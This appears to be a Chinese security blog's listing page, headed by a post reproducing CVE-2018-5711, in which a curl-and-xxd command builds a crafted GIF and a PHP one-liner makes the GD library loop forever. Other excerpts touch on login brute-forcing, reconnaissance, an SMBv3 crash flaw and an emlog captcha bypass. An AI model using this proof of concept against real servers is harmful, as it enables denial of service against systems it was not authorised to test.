复现CVE-2018-5711:一张gif图片让服务器崩溃
refer:http://www.freebuf.com/vuls/161262.html $ curl -L https://git.io/vN0n4 | xxd -r > poc.gif $ php -r 'imagecreatefromgif("poc.gif");' Infinite loop here... 就是生成...
这家伙很懒,还没填写该栏目的介绍呢~
refer:http://www.freebuf.com/vuls/161262.html $ curl -L https://git.io/vN0n4 | xxd -r > poc.gif $ php -r 'imagecreatefromgif("poc.gif");' Infinite loop here... 就是生成...
前言 爆破在渗透测试中,对技术的要求不高,但是对技巧和字典的要求就很高了,本篇整理下平时学到的一些爆破思路和技巧(偏web渗透登陆),当你无措可施时,暴力破解是最好的方式。 世界上最可怕的事情是你的习惯被别人掌握,一旦有律可循,You got Hacked。 爆破之字典准备 fuzz 字典 ...
前言 从今年2月份来到乙方实习,到6月份毕业,同一家公司转正,从事渗透测试/安全研究相关工作,漏洞悬赏平台的公司性质提供了很多授权实战的机会,感谢YY和ZSW两位前辈的培养,梳理下笔记发布到博客。 本篇整理信息收集阶段,大概会占渗透测试总时间的60%,视能力和情况而定,做到不影响企业业...
北京时间2月2日,国外技术网站Github曝光了Windows SMBv3存在远程攻击0day漏洞。根据已公开的漏洞验证代码(POC),未经身份验证的攻击者可以迫使受影响系统蓝屏崩溃。目前微软尚未对此漏洞发布公告,暂不明确何时将推出补丁。 漏洞预警:http://www.freebuf.com/vuls/126100.html ...
帮朋友爬的,两个列表,一个纯url 一个url+厂商名称 url1.txt url.txt
http://www.freebuf.com/news/topnews/118424.html 木马写到进程在流量方面抓取明文密码?可怕 23333
涉及所有带有注册会员的模板和插件,包括emlog大前端,此漏洞会带来不可预计的效果! 本来早就发现了此漏洞,但是一直懒得修复,但还是有别人也发现了此漏洞 感谢@冥羽 的反馈 漏洞在发现的时候也提交了官方,但官方一直没个动静,只好自己修复了,其实我比较懒。 修复方式: 下载压缩包解压到emlo...
描述 大家可能为了防止黑客对emlog博客后台暴力破解,在后台添加了验证码功能。 但即使在Emlog后台添加了验证码,也不安全,就跟没添加一样的。攻击者依然可以使用爆破工具批量猜测密码 本文章由小草窝 x.hacking8.com原创, 转载请注明转载来自小草窝 x.hacking8.com 代码分析...
热门文章
358 次阅读 , 0 则评论
333 次阅读 , 0 则评论
292 次阅读 , 0 则评论
272 次阅读 , 0 则评论